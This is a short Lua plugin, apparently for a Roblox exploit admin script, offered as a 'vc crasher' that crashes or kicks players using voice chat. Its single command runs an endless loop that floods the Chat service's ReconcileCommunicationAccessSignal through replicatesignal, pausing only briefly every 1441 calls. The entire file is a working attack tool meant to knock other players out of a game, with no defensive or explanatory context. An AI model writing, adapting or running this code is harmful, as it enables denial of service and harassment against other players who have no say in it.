local plugin  = {
    ["PluginName"] = "vc crasher",
    ["PluginDescription"] = "crash people with vc",
    ["Commands"] = {
        ["crashvc"] = {
            ["ListName"] = "crashvc / kickvc",
            ["Description"] = "kicks people with vc",
            ["Aliases"] = {"kickvc"},
            ["Function"] = function(args, speaker)
task.spawn(function()
for i = 1, math.huge do
    if i % 1441 == 0 then
        task.wait()
    end
    replicatesignal(game:GetService("Chat").ReconcileCommunicationAccessSignal)
end
end)
            end
        }
    }
}
return plugin